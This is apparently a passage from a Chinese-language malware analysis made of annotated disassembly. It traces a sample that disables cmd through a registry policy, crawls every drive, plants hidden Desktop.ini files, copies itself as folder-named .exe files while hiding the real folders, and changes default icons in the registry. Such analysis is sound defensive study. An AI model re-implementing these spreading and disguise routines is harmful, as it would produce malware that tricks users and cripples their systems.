00401DFF|.50 push eax ; |Subkey
00401E00|.68 01000080 push 80000001 ; |hKey = HKEY_CURRENT_USER
00401E05|.FF15 6C834300 call dword ptr [<&ADVAPI32.RegCreateK>; \RegCreateKeyExA
00401E0B|.3BF4 cmp esi, esp
00401E0D|.E8 AE1D0000 call 00403BC0
00401E12|.8BF4 mov esi, esp
00401E14|.6A 04 push 4 ; /BufSize = 4
00401E16|.8D8D C8FDFFFF lea ecx, dword ptr ; |
00401E1C|.51 push ecx ; |Buffer
00401E1D|.6A 04 push 4 ; |ValueType = REG_DWORD
00401E1F|.6A 00 push 0 ; |Reserved = 0
00401E21|.68 BCE14200 push 0042E1BC ; |ValueName = "DisableCMD"
00401E26|.8B95 CCFDFFFF mov edx, dword ptr ; |
00401E2C|.52 push edx ; |hKey
00401E2D|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \创建注册表Software\Policies\Microsoft\Windows\System\DisableCMD:0x00000002禁用cmd
00401E33|.3BF4 cmp esi, esp
00401E35|.E8 861D0000 call 00403BC0
00401E3A|.8BF4 mov esi, esp
00401E3C|.8B85 CCFDFFFF mov eax, dword ptr
00401E42|.50 push eax ; /hKey
00401E43|.FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401E49|.3BF4 cmp esi, esp
00401E4B|.E8 701D0000 call 00403BC0
00401E50|.5F pop edi
00401E51|.5E pop esi
00401E52|.5B pop ebx
00401E53|.81C4 7C020000 add esp, 27C
00401E59|.3BEC cmp ebp, esp
00401E5B|.E8 601D0000 call 00403BC0
00401E60|.8BE5 mov esp, ebp
00401E62|.5D pop ebp
00401E63\.C3 retn
6.获取驱动器类型遍历磁盘在所有文件夹里添加Desktop.ini、一级目录下创建同名文件夹.exe并设置原文件夹为系统隐藏属性
004026A0/> \55 push ebp
004026A1|.8BEC mov ebp, esp
004026A3|.83EC 40 sub esp, 40
004026A6|.53 push ebx
004026A7|.56 push esi
004026A8|.57 push edi
004026A9|.8D7D C0 lea edi, dword ptr
004026AC|.B9 10000000 mov ecx, 10
004026B1|.B8 CCCCCCCC mov eax, CCCCCCCC
004026B6|.F3:AB rep stos dword ptr es:
004026B8|.8BF4 mov esi, esp
004026BA|.8B45 08 mov eax, dword ptr
004026BD|.50 push eax ; /RootPathName
004026BE|.FF15 D4834300 call dword ptr [<&KERNEL32.GetDriveTy>; \获取驱动器类型
004027A0/> \55 push ebp
004027A1|.8BEC mov ebp, esp
004027A3|.81EC 84010000 sub esp, 184
004027A9|.53 push ebx
004027AA|.56 push esi
004027AB|.57 push edi
004027AC|.8DBD 7CFEFFFF lea edi, dword ptr
004027B2|.B9 61000000 mov ecx, 61
004027B7|.B8 CCCCCCCC mov eax, CCCCCCCC
004027BC|.F3:AB rep stos dword ptr es:
004027BE|.8BF4 mov esi, esp
004027C0|.8B45 08 mov eax, dword ptr
004027C3|.50 push eax ; /<%s>
004027C4|.68 34E54200 push 0042E534 ; |Format = "%s\Desktop.ini"
004027C9|.8D8D FCFEFFFF lea ecx, dword ptr ; |
004027CF|.51 push ecx ; |s
004027D0|.FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
004027D6|.83C4 0C add esp, 0C
004027D9|.3BF4 cmp esi, esp
004027DB|.E8 E0130000 call 00403BC0
004027E0|.B9 0C000000 mov ecx, 0C
004027E5|.BE F4E44200 mov esi, 0042E4F4 ; "[.ShellClassInfo]",LF,"IconFile=Recycle.exe",LF,"IconIndex=0"
004027EA|.8DBD C0FEFFFF lea edi, dword ptr
004027F0|.F3:A5 rep movs dword ptr es:, dword p>
004027F2|.66:A5 movs word ptr es:, word ptr [esi>
004027F4|.A4 movs byte ptr es:, byte ptr [esi>
004027F5|.C785 F8FEFFFF>mov dword ptr , 33
004027FF|.8BF4 mov esi, esp
00402801|.6A 00 push 0 ; /hTemplateFile = NULL
00402803|.6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00402805|.6A 02 push 2 ; |Mode = CREATE_ALWAYS
00402807|.6A 00 push 0 ; |pSecurity = NULL
00402809|.6A 00 push 0 ; |ShareMode = 0
0040280B|.68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00402810|.8D95 FCFEFFFF lea edx, dword ptr ; |
00402816|.52 push edx ; |FileName
00402817|.FF15 14844300 call dword ptr [<&KERNEL32.CreateFile>; \创建文件c:\windows\Desktop.ini
0040281D|.3BF4 cmp esi, esp
0040281F|.E8 9C130000 call 00403BC0
00402824|.8985 BCFEFFFF mov dword ptr , eax
0040282A|.8BF4 mov esi, esp
0040282C|.6A 00 push 0 ; /pOverlapped = NULL
0040282E|.8D85 F4FEFFFF lea eax, dword ptr ; |
00402834|.50 push eax ; |pBytesWritten
00402835|.8B8D F8FEFFFF mov ecx, dword ptr ; |
0040283B|.83E9 01 sub ecx, 1 ; |
0040283E|.51 push ecx ; |nBytesToWrite
0040283F|.8D95 C0FEFFFF lea edx, dword ptr ; |
00402845|.52 push edx ; |Buffer
00402846|.8B85 BCFEFFFF mov eax, dword ptr ; |
0040284C|.50 push eax ; |hFile
0040284D|.FF15 D8834300 call dword ptr [<&KERNEL32.WriteFile>>; \写入文件,内容为[.ShellClassInfo]
IconFile=Recycle.exe
IconIndex=0
00402853|.3BF4 cmp esi, esp
00402855|.E8 66130000 call 00403BC0
0040285A|.8BF4 mov esi, esp
0040285C|.6A 06 push 6 ; /FileAttributes = HIDDEN|SYSTEM
0040285E|.8D8D FCFEFFFF lea ecx, dword ptr ; |
00402864|.51 push ecx ; |FileName
00402865|.FF15 C4834300 call dword ptr [<&KERNEL32.SetFileAtt>; \设置文件为隐藏和系统属性
00401F10/> \55 push ebp
00401F11|.8BEC mov ebp, esp
00401F13|.81EC A80C0000 sub esp, 0CA8
00401F19|.53 push ebx
00401F1A|.56 push esi
00401F1B|.57 push edi
00401F1C|.8DBD 58F3FFFF lea edi, dword ptr
00401F22|.B9 2A030000 mov ecx, 32A
00401F27|.B8 CCCCCCCC mov eax, CCCCCCCC
00401F2C|.F3:AB rep stos dword ptr es:
00401F2E|.8BF4 mov esi, esp
00401F30|.8D85 FCFEFFFF lea eax, dword ptr
00401F36|.50 push eax ; /Buffer
00401F37|.68 04010000 push 104 ; |BufSize = 104 (260.)
00401F3C|.FF15 D0834300 call dword ptr [<&KERNEL32.GetLogical>; \获取逻辑驱动器
00401F42|.3BF4 cmp esi, esp
00401F44|.E8 771C0000 call 00403BC0
00401F49|.8985 F4F9FFFF mov dword ptr , eax
00401F4F|.8BF4 mov esi, esp
00401F51|.8B8D F4F9FFFF mov ecx, dword ptr
00401F57|.51 push ecx ; /<%d>
00401F58|.68 D4E44200 push 0042E4D4 ; |Format = "%d"
00401F5D|.8D95 F8F9FFFF lea edx, dword ptr ; |
00401F63|.52 push edx ; |s
00401F64|.FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00401F6A|.83C4 0C add esp, 0C
00401F6D|.3BF4 cmp esi, esp
00401F6F|.E8 4C1C0000 call 00403BC0
00401F74|.C785 F0F9FFFF>mov dword ptr , 0
00401F7E|.EB 0F jmp short 00401F8F
00401F80|>8B85 F0F9FFFF /mov eax, dword ptr
00401F86|.83C0 04 |add eax, 4
00401F89|.8985 F0F9FFFF |mov dword ptr , eax
00401F8F|>8B8D F0F9FFFFmov ecx, dword ptr
00401F95|.3B8D F4F9FFFF |cmp ecx, dword ptr
00401F9B|.0F84 5C050000 |je 004024FD
00401FA1|.8B95 F0F9FFFF |mov edx, dword ptr
00401FA7|.0FBE8415 FEFE>|movsx eax, byte ptr
00401FAF|.8BF4 |mov esi, esp
00401FB1|.50 |push eax ; /<%c>
00401FB2|.8B8D F0F9FFFF |mov ecx, dword ptr ; |
00401FB8|.0FBE940D FDFE>|movsx edx, byte ptr ; |
00401FC0|.52 |push edx ; |<%c>
00401FC1|.8B85 F0F9FFFF |mov eax, dword ptr ; |
00401FC7|.0FBE8C05 FCFE>|movsx ecx, byte ptr ; |
00401FCF|.51 |push ecx ; |<%c>
00401FD0|.68 CCE44200 |push 0042E4CC ; |Format = "%c%c%c"
00401FD5|.8D95 F8FDFFFF |lea edx, dword ptr ; |
00401FDB|.52 |push edx ; |s
00401FDC|.FF15 14864300 |call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00401FE2|.83C4 14 |add esp, 14
00401FE5|.3BF4 |cmp esi, esp
00401FE7|.E8 D41B0000 |call 00403BC0
00401FEC|.68 C8E44200 |push 0042E4C8 ;ASCII "*.*"
00401FF1|.8D85 F8FDFFFF |lea eax, dword ptr
00401FF7|.50 |push eax
00401FF8|.E8 931C0000 |call 00403C90
00401FFD|.83C4 08 |add esp, 8
00402000|.8BF4 |mov esi, esp
00402002|.8D8D B0F8FFFF |lea ecx, dword ptr
00402008|.51 |push ecx ; /pFindFileData
00402009|.8D95 F8FDFFFF |lea edx, dword ptr ; |
0040200F|.52 |push edx ; |FileName
00402010|.FF15 CC834300 |call dword ptr [<&KERNEL32.FindFirst>; \搜索所有文件夹
00402016|.3BF4 |cmp esi, esp
00402018|.E8 A31B0000 |call 00403BC0
0040201D|.8985 ACF8FFFF |mov dword ptr , eax
00402023|.83BD ACF8FFFF>|cmp dword ptr , -1
0040202A|.75 05 |jnz short 00402031
0040202C|.^ E9 4FFFFFFF |jmp 00401F80
00402031|>C685 FBFDFFFF>|mov byte ptr , 0
00402038|>8BF4 |/mov esi, esp
0040203A|.8D85 B0F8FFFF ||lea eax, dword ptr
00402040|.50 ||push eax ; /pFindFileData
00402041|.8B8D ACF8FFFF ||mov ecx, dword ptr ; |
00402047|.51 ||push ecx ; |hFile
00402048|.FF15 C8834300 ||call dword ptr [<&KERNEL32.FindNext>; \还是搜文件
0040204E|.3BF4 ||cmp esi, esp
00402050|.E8 6B1B0000 ||call 00403BC0
00402055|.85C0 ||test eax, eax
00402057|.0F84 85040000 ||je 004024E2
0040205D|.8B95 B0F8FFFF ||mov edx, dword ptr
00402063|.83E2 10 ||and edx, 10
00402066|.85D2 ||test edx, edx
00402068|.0F84 A3030000 ||je 00402411
0040206E|.8D85 DCF8FFFF ||lea eax, dword ptr
00402074|.50 ||push eax
00402075|.E8 C61A0000 ||call 00403B40
0040207A|.83C4 04 ||add esp, 4
0040207D|.83F8 64 ||cmp eax, 64
00402080|.0F87 17020000 ||ja 0040229D
00402086|.8BF4 ||mov esi, esp
00402088|.8D8D DCF8FFFF ||lea ecx, dword ptr
0040208E|.51 ||push ecx ; /<%s>
0040208F|.8D95 F8FDFFFF ||lea edx, dword ptr ; |
00402095|.52 ||push edx ; |<%s>
00402096|.68 44E44200 ||push 0042E444 ; |Format = "%s%s AI_Boy.exe"
0040209B|.8D85 A8F7FFFF ||lea eax, dword ptr ; |
004020A1|.50 ||push eax ; |s
004020A2|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
004020A8|.83C4 10 ||add esp, 10
004020AB|.3BF4 ||cmp esi, esp
004020AD|.E8 0E1B0000 ||call 00403BC0
004020B2|.8BF4 ||mov esi, esp
004020B4|.8D8D DCF8FFFF ||lea ecx, dword ptr
004020BA|.51 ||push ecx ; /<%s>
004020BB|.8D95 F8FDFFFF ||lea edx, dword ptr ; |
004020C1|.52 ||push edx ; |<%s>
004020C2|.68 3CE44200 ||push 0042E43C ; |Format = "%s%s"
004020C7|.8D85 A4F6FFFF ||lea eax, dword ptr ; |
004020CD|.50 ||push eax ; |s
004020CE|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
004020D4|.83C4 10 ||add esp, 10
004020D7|.3BF4 ||cmp esi, esp
004020D9|.E8 E21A0000 ||call 00403BC0
004020DE|.8D8D A4F6FFFF ||lea ecx, dword ptr
004020E4|.51 ||push ecx
004020E5|.E8 1BEFFFFF ||call 00401005
004020EA|.83C4 04 ||add esp, 4
004020ED|.8BF4 ||mov esi, esp
004020EF|.8D95 A4F6FFFF ||lea edx, dword ptr
004020F5|.52 ||push edx ; /<%s>
004020F6|.68 F0E04200 ||push 0042E0F0 ; |Format = "%s.exe AI_Boy....\"
004020FB|.8D85 9CF4FFFF ||lea eax, dword ptr ; |
00402101|.50 ||push eax ; |s
00402102|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402108|.83C4 0C ||add esp, 0C
0040210B|.3BF4 ||cmp esi, esp
0040210D|.E8 AE1A0000 ||call 00403BC0
00402112|.8D8D 9CF4FFFF ||lea ecx, dword ptr
00402118|.51 ||push ecx
00402119|.8D95 A4F6FFFF ||lea edx, dword ptr
0040211F|.52 ||push edx
00402120|.E8 0B1B0000 ||call 00403C30
00402125|.83C4 08 ||add esp, 8
00402128|.8BF4 ||mov esi, esp
0040212A|.FF15 E0834300 ||call dword ptr [<&KERNEL32.GetLastE>; [GetLastError
00402130|.3BF4 ||cmp esi, esp
00402132|.E8 891A0000 ||call 00403BC0
00402137|.85C0 ||test eax, eax
00402139|.0F85 AF000000 ||jnz 004021EE
0040213F|.8BF4 ||mov esi, esp
00402141|.8D85 9CF4FFFF ||lea eax, dword ptr
00402147|.50 ||push eax ; /<%s>
00402148|.68 28E44200 ||push 0042E428 ; |Format = "%s\Recycle.exe"
0040214D|.8D8D A0F5FFFF ||lea ecx, dword ptr ; |
00402153|.51 ||push ecx ; |s
00402154|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
0040215A|.83C4 0C ||add esp, 0C
0040215D|.3BF4 ||cmp esi, esp
0040215F|.E8 5C1A0000 ||call 00403BC0
00402164|.8BF4 ||mov esi, esp
00402166|.6A 00 ||push 0 ; /FailIfExists = FALSE
00402168|.8D95 A8F7FFFF ||lea edx, dword ptr ; |
0040216E|.52 ||push edx ; |NewFileName
0040216F|.68 301A4300 ||push 00431A30 ; |ExistingFileName = "C:\WINDOWS\svchost.exe"
00402174|.FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \复制文件创建文件夹同名.exe
0040217A|.3BF4 ||cmp esi, esp
0040217C|.E8 3F1A0000 ||call 00403BC0
00402181|.8BF4 ||mov esi, esp
00402183|.6A 00 ||push 0 ; /FailIfExists = FALSE
00402185|.8D85 A0F5FFFF ||lea eax, dword ptr ; |
0040218B|.50 ||push eax ; |NewFileName
0040218C|.68 341B4300 ||push 00431B34 ; |ExistingFileName = "C:\WINDOWS\system\svchost.exe"
00402191|.FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
00402197|.3BF4 ||cmp esi, esp
00402199|.E8 221A0000 ||call 00403BC0
0040219E|.8BF4 ||mov esi, esp
004021A0|.68 80000000 ||push 80 ; /FileAttributes = NORMAL
004021A5|.8D8D A8F7FFFF ||lea ecx, dword ptr ; |
004021AB|.51 ||push ecx ; |FileName
004021AC|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
004021B2|.3BF4 ||cmp esi, esp
004021B4|.E8 071A0000 ||call 00403BC0
004021B9|.8BF4 ||mov esi, esp
004021BB|.6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004021BD|.8D95 9CF4FFFF ||lea edx, dword ptr ; |
004021C3|.52 ||push edx ; |FileName
004021C4|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \设置文件为隐藏、系统属性
004021CA|.3BF4 ||cmp esi, esp
004021CC|.E8 EF190000 ||call 00403BC0
004021D1|.8BF4 ||mov esi, esp
004021D3|.6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004021D5|.8D85 A0F5FFFF ||lea eax, dword ptr ; |
004021DB|.50 ||push eax ; |FileName
004021DC|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
004021E2|.3BF4 ||cmp esi, esp
004021E4|.E8 D7190000 ||call 00403BC0
004021E9|.E9 AA000000 ||jmp 00402298
004021EE|>8BF4 ||mov esi, esp
004021F0|.8D8D 9CF4FFFF ||lea ecx, dword ptr
004021F6|.51 ||push ecx ; /<%s>
004021F7|.68 28E44200 ||push 0042E428 ; |Format = "%s\Recycle.exe"
004021FC|.8D95 A0F5FFFF ||lea edx, dword ptr ; |
00402202|.52 ||push edx ; |s
00402203|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402209|.83C4 0C ||add esp, 0C
0040220C|.3BF4 ||cmp esi, esp
0040220E|.E8 AD190000 ||call 00403BC0
00402213|.8BF4 ||mov esi, esp
00402215|.6A 00 ||push 0 ; /FailIfExists = FALSE
00402217|.8D85 A8F7FFFF ||lea eax, dword ptr ; |
0040221D|.50 ||push eax ; |NewFileName
0040221E|.68 301A4300 ||push 00431A30 ; |ExistingFileName = "C:\WINDOWS\svchost.exe"
00402223|.FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
00402229|.3BF4 ||cmp esi, esp
0040222B|.E8 90190000 ||call 00403BC0
00402230|.8BF4 ||mov esi, esp
00402232|.6A 00 ||push 0 ; /FailIfExists = FALSE
00402234|.8D8D A0F5FFFF ||lea ecx, dword ptr ; |
0040223A|.51 ||push ecx ; |NewFileName
0040223B|.68 341B4300 ||push 00431B34 ; |ExistingFileName = "C:\WINDOWS\system\svchost.exe"
00402240|.FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
00402246|.3BF4 ||cmp esi, esp
00402248|.E8 73190000 ||call 00403BC0
0040224D|.8BF4 ||mov esi, esp
0040224F|.68 80000000 ||push 80 ; /FileAttributes = NORMAL
00402254|.8D95 A8F7FFFF ||lea edx, dword ptr ; |
0040225A|.52 ||push edx ; |FileName
0040225B|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402261|.3BF4 ||cmp esi, esp
00402263|.E8 58190000 ||call 00403BC0
00402268|.8BF4 ||mov esi, esp
0040226A|.6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
0040226C|.8D85 A4F6FFFF ||lea eax, dword ptr ; |
00402272|.50 ||push eax ; |FileName
00402273|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402279|.3BF4 ||cmp esi, esp
0040227B|.E8 40190000 ||call 00403BC0
00402280|.8BF4 ||mov esi, esp
00402282|.6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
00402284|.8D8D A0F5FFFF ||lea ecx, dword ptr ; |
0040228A|.51 ||push ecx ; |FileName
0040228B|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402291|.3BF4 ||cmp esi, esp
00402293|.E8 28190000 ||call 00403BC0
00402298|>E9 6F010000 ||jmp 0040240C
0040229D|>8BF4 ||mov esi, esp
0040229F|.8D95 DCF8FFFF ||lea edx, dword ptr
004022A5|.52 ||push edx ; /<%s>
004022A6|.8D85 F8FDFFFF ||lea eax, dword ptr ; |
004022AC|.50 ||push eax ; |<%s>
004022AD|.68 3CE44200 ||push 0042E43C ; |Format = "%s%s"
004022B2|.8D8D A8F7FFFF ||lea ecx, dword ptr ; |
004022B8|.51 ||push ecx ; |s
004022B9|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
004022BF|.83C4 10 ||add esp, 10
004022C2|.3BF4 ||cmp esi, esp
004022C4|.E8 F7180000 ||call 00403BC0
004022C9|.8BF4 ||mov esi, esp
004022CB|.8D95 A8F7FFFF ||lea edx, dword ptr
004022D1|.52 ||push edx ; /<%s>
004022D2|.68 20E44200 ||push 0042E420 ; |Format = "%s.\"
004022D7|.8D85 98F3FFFF ||lea eax, dword ptr ; |
004022DD|.50 ||push eax ; |s
004022DE|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
004022E4|.83C4 0C ||add esp, 0C
004022E7|.3BF4 ||cmp esi, esp
004022E9|.E8 D2180000 ||call 00403BC0
004022EE|.8D8D 98F3FFFF ||lea ecx, dword ptr
004022F4|.51 ||push ecx
004022F5|.E8 0BEDFFFF ||call 00401005
004022FA|.83C4 04 ||add esp, 4
004022FD|.8D95 A8F7FFFF ||lea edx, dword ptr
00402303|.52 ||push edx
00402304|.E8 37180000 ||call 00403B40
00402309|.83C4 04 ||add esp, 4
0040230C|.83E8 6B ||sub eax, 6B
0040230F|.50 ||push eax
00402310|.8D85 A8F7FFFF ||lea eax, dword ptr
00402316|.50 ||push eax
00402317|.8D8D A4F6FFFF ||lea ecx, dword ptr
0040231D|.51 ||push ecx
0040231E|.E8 1D170000 ||call 00403A40
00402323|.83C4 0C ||add esp, 0C
00402326|.8D95 A8F7FFFF ||lea edx, dword ptr
0040232C|.52 ||push edx
0040232D|.E8 0E180000 ||call 00403B40
00402332|.83C4 04 ||add esp, 4
00402335|.C68405 39F6FF>||mov byte ptr , 0
0040233D|.8BF4 ||mov esi, esp
0040233F|.8D85 A4F6FFFF ||lea eax, dword ptr
00402345|.50 ||push eax ; /<%s>
00402346|.68 A0E34200 ||push 0042E3A0 ; |Format = "%s AI_Boy.exe"
0040234B|.8D8D 9CF4FFFF ||lea ecx, dword ptr ; |
00402351|.51 ||push ecx ; |s
00402352|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402358|.83C4 0C ||add esp, 0C
0040235B|.3BF4 ||cmp esi, esp
0040235D|.E8 5E180000 ||call 00403BC0
00402362|.8BF4 ||mov esi, esp
00402364|.8D95 A8F7FFFF ||lea edx, dword ptr
0040236A|.52 ||push edx ; /<%s>
0040236B|.68 28E44200 ||push 0042E428 ; |Format = "%s\Recycle.exe"
00402370|.8D85 A0F5FFFF ||lea eax, dword ptr ; |
00402376|.50 ||push eax ; |s
00402377|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
0040237D|.83C4 0C ||add esp, 0C
00402380|.3BF4 ||cmp esi, esp
00402382|.E8 39180000 ||call 00403BC0
00402387|.8BF4 ||mov esi, esp
00402389|.6A 00 ||push 0 ; /FailIfExists = FALSE
0040238B|.8D8D 9CF4FFFF ||lea ecx, dword ptr ; |
00402391|.51 ||push ecx ; |NewFileName
00402392|.68 301A4300 ||push 00431A30 ; |ExistingFileName = "C:\WINDOWS\svchost.exe"
00402397|.FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
0040239D|.3BF4 ||cmp esi, esp
0040239F|.E8 1C180000 ||call 00403BC0
004023A4|.8BF4 ||mov esi, esp
004023A6|.6A 00 ||push 0 ; /FailIfExists = FALSE
004023A8|.8D95 A0F5FFFF ||lea edx, dword ptr ; |
004023AE|.52 ||push edx ; |NewFileName
004023AF|.68 341B4300 ||push 00431B34 ; |ExistingFileName = "C:\WINDOWS\system\svchost.exe"
004023B4|.FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
004023BA|.3BF4 ||cmp esi, esp
004023BC|.E8 FF170000 ||call 00403BC0
004023C1|.8BF4 ||mov esi, esp
004023C3|.6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004023C5|.8D85 98F3FFFF ||lea eax, dword ptr ; |
004023CB|.50 ||push eax ; |FileName
004023CC|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
004023D2|.3BF4 ||cmp esi, esp
004023D4|.E8 E7170000 ||call 00403BC0
004023D9|.8BF4 ||mov esi, esp
004023DB|.6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004023DD|.8D8D A0F5FFFF ||lea ecx, dword ptr ; |
004023E3|.51 ||push ecx ; |FileName
004023E4|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
004023EA|.3BF4 ||cmp esi, esp
004023EC|.E8 CF170000 ||call 00403BC0
004023F1|.8BF4 ||mov esi, esp
004023F3|.68 80000000 ||push 80 ; /FileAttributes = NORMAL
004023F8|.8D95 9CF4FFFF ||lea edx, dword ptr ; |
004023FE|.52 ||push edx ; |FileName
004023FF|.FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402405|.3BF4 ||cmp esi, esp
00402407|.E8 B4170000 ||call 00403BC0
0040240C|>E9 CC000000 ||jmp 004024DD
00402411|>8D85 DCF8FFFF ||lea eax, dword ptr
00402417|.50 ||push eax
00402418|.E8 23170000 ||call 00403B40
0040241D|.83C4 04 ||add esp, 4
00402420|.83F8 64 ||cmp eax, 64
00402423|.0F87 B4000000 ||ja 004024DD
00402429|.8BF4 ||mov esi, esp
0040242B|.8D8D DCF8FFFF ||lea ecx, dword ptr
00402431|.51 ||push ecx ; /<%s>
00402432|.68 9CE34200 ||push 0042E39C ; |Format = "%s"
00402437|.8D95 A8F7FFFF ||lea edx, dword ptr ; |
0040243D|.52 ||push edx ; |s
0040243E|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402444|.83C4 0C ||add esp, 0C
00402447|.3BF4 ||cmp esi, esp
00402449|.E8 72170000 ||call 00403BC0
0040244E|.8BF4 ||mov esi, esp
00402450|.8D85 DCF8FFFF ||lea eax, dword ptr
00402456|.50 ||push eax ; /<%s>
00402457|.8D8D F8FDFFFF ||lea ecx, dword ptr ; |
0040245D|.51 ||push ecx ; |<%s>
0040245E|.68 3CE44200 ||push 0042E43C ; |Format = "%s%s"
00402463|.8D95 A4F6FFFF ||lea edx, dword ptr ; |
00402469|.52 ||push edx ; |s
0040246A|.FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402470|.83C4 10 ||add esp, 10
00402473|.3BF4 ||cmp esi, esp
00402475|.E8 46170000 ||call 00403BC0
0040247A|.8D85 A8F7FFFF ||lea eax, dword ptr
00402480|.50 ||push eax
00402481|.E8 BA160000 ||call 00403B40
00402486|.83C4 04 ||add esp, 4
00402489|.0FBE8C05 A5F7>||movsx ecx, byte ptr
00402491|.83F9 65 ||cmp ecx, 65
00402494|.75 47 ||jnz short 004024DD
00402496|.8D95 A8F7FFFF ||lea edx, dword ptr
0040249C|.52 ||push edx
0040249D|.E8 9E160000 ||call 00403B40
004024A2|.83C4 04 ||add esp, 4
004024A5|.0FBE8405 A6F7>||movsx eax, byte ptr
004024AD|.83F8 78 ||cmp eax, 78
004024B0|.75 2B ||jnz short 004024DD
004024B2|.8D8D A8F7FFFF ||lea ecx, dword ptr
004024B8|.51 ||push ecx
004024B9|.E8 82160000 ||call 00403B40
004024BE|.83C4 04 ||add esp, 4
004024C1|.0FBE9405 A7F7>||movsx edx, byte ptr
004024C9|.83FA 65 ||cmp edx, 65
004024CC|.75 0F ||jnz short 004024DD
004024CE|.8D85 A4F6FFFF ||lea eax, dword ptr
004024D4|.50 ||push eax
004024D5|.E8 30EBFFFF ||call 0040100A
004024DA|.83C4 04 ||add esp, 4
004024DD|>^ E9 56FBFFFF |\jmp 00402038
004024E2|>8BF4 |mov esi, esp
004024E4|.8B8D ACF8FFFF |mov ecx, dword ptr
004024EA|.51 |push ecx ; /hSearch
004024EB|.FF15 C0834300 |call dword ptr [<&KERNEL32.FindClose>; \FindClose
004024F1|.3BF4 |cmp esi, esp
004024F3|.E8 C8160000 |call 00403BC0
004024F8|.^ E9 83FAFFFF \jmp 00401F80
004024FD|>5F pop edi
004024FE|.5E pop esi
004024FF|.5B pop ebx
00402500|.81C4 A80C0000 add esp, 0CA8
00402506|.3BEC cmp ebp, esp
00402508|.E8 B3160000 call 00403BC0
0040250D|.8BE5 mov esp, ebp
0040250F|.5D pop ebp
00402510\.C3 retn
7.修改注册表,修改文件默认图标
00403430/> \55 push ebp
00403431|.8BEC mov ebp, esp
00403433|.81EC 60050000 sub esp, 560
00403439|.53 push ebx
0040343A|.56 push esi
0040343B|.57 push edi
0040343C|.8DBD A0FAFFFF lea edi, dword ptr
00403442|.B9 58010000 mov ecx, 158
00403447|.B8 CCCCCCCC mov eax, CCCCCCCC
0040344C|.F3:AB rep stos dword ptr es:
0040344E|.8BF4 mov esi, esp
00403450|.68 341B4300 push 00431B34 ; /<%s> = "C:\WINDOWS\system\svchost.exe"
00403455|.68 84E74200 push 0042E784 ; |Format = "%s,0"
0040345A|.8D85 F4FDFFFF lea eax, dword ptr ; |
00403460|.50 push eax ; |s
00403461|.FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00403467|.83C4 0C add esp, 0C
0040346A|.3BF4 cmp esi, esp
0040346C|.E8 4F070000 call 00403BC0
00403471|.8BF4 mov esi, esp
00403473|.8B4D 08 mov ecx, dword ptr
00403476|.51 push ecx ; /<%s>
00403477|.68 68E74200 push 0042E768 ; |Format = "CLSID\%s\DefaultIcon"
0040347C|.8D95 F8FEFFFF lea edx, dword ptr ; |
00403482|.52 push edx ; |s
00403483|.FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00403489|.83C4 0C add esp, 0C
0040348C|.3BF4 cmp esi, esp
0040348E|.E8 2D070000 call 00403BC0
00403493|.8BF4 mov esi, esp
00403495|.8D45 FC lea eax, dword ptr
00403498|.50 push eax ; /pHandle
00403499|.68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
0040349E|.6A 00 push 0 ; |Reserved = 0
004034A0|.8D8D F8FEFFFF lea ecx, dword ptr ; |
004034A6|.51 push ecx ; |Subkey
004034A7|.68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
004034AC|.FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
004034B2|.3BF4 cmp esi, esp
004034B4|.E8 07070000 call 00403BC0
004034B9|.8D95 F4FDFFFF lea edx, dword ptr
